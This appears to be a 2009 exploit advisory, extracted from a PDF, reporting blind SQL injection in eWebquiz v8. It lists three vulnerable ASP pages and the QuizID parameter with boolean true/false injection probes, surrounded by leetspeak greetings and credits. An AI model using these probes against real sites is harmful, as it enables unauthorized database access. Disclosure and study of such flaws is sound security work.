eWebquiz v8 Blind SQL Injection Vulnerability.pdf

1 [?] ?????????????????????????{In The Name Of Allah The Mercifull}?????????????????????? 2 [?] 3 [~] Tybe: (multi) Blind SQL Injection Vulnerability 4 [~] Vendor: www.activewebsoftwares.com 5 [*] Software: eWebquiz v 8 6 [*] author: ((R3d−D3v!L)) 7 [*] Date: 18.dec.2009 8 [*] T!ME: 12:00 am 9 [?] Home: WwW.xP10.ME 10 [?] contact: N/A 11 [?] 12 [?]??????????????????????{DEV!L’5 of SYST3M}?????????????????? 13 14 15 16 17 [*] Err0r C0N50L3: 18 19 http://server/questions.asp?QuizID={Xp10} 20 21 0R 22 23 http://server/importquestions.asp?QuizID={offsec} 24 25 or 26 27 http://server/quiztakers.asp?QuizID=((r3d D3v!L)) 28 29 30 [~] {Xp10}: 31 32 7Ru3 : questions.asp?QuizID=1 and 1=1 33 34 f4L53: questions.asp?QuizID=1 and 1=2 35 36 0R 37 {offsec} 38 7Ru3 : importquestions.asp?QuizID=1 and 1=1 39 40 f4L53: importquestions.asp?QuizID=1 and 1=2 41 42 0r 43 ((r3d D3v!L)) 44 7Ru3 : quiztakers.asp?QuizID=1 and 1=1 45 46 f4L53: quiztakers.asp?QuizID=1 and 1=2 47 48 N073: 49 50 51 N073: 52 Page 1/2 eWebquiz v8 Blind SQL Injection Vulnerability R3d−D3v!L 12/17/2009 53 ! 7h!/\/k u can f!nd m0r3 54 just let your m1nd breath ;) 55 56 ! GAZA !N 0uR HEART’s blood and M!ND 57 [~]−−−−−−−−−−−−−−−−−−−−−−−−−−−−−{D3V!L5 0F 7h3 SYS73M!?!}−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 58 59 [~] Greetz tO: dolly & L!TTLE 547r & 0r45hy & DEV!L_MODY & po!S!ON Sc0rp!0N & mAG0ush_1987 60 61 [~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ 62 63 [~] spechial thanks : ab0 mohammed & XP_10 h4CK3R & JASM!N & c0prA & MARWA & N0RHAN & S4R4 64 65 [?]spechial SupP0RT: MY M!ND ;) & dookie2000ca & ((OFFsec)) 66 67 [?]4r48!4n.!nforma7!0N.53cur!7y −−−> ((r3d D3v!L))−−M2Z−−DEV!L_Ro07−−JUPA 68 69 [~]spechial FR!ND: 74M3M 70 71 [~] !’M 4R48!4N 3XPL0!73R. 72 73 [~] {[(D!R 4ll 0R D!E)]}; 74 75 [~]−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− Page 2/2 eWebquiz v8 Blind SQL Injection Vulnerability R3d−D3v!L 12/17/2009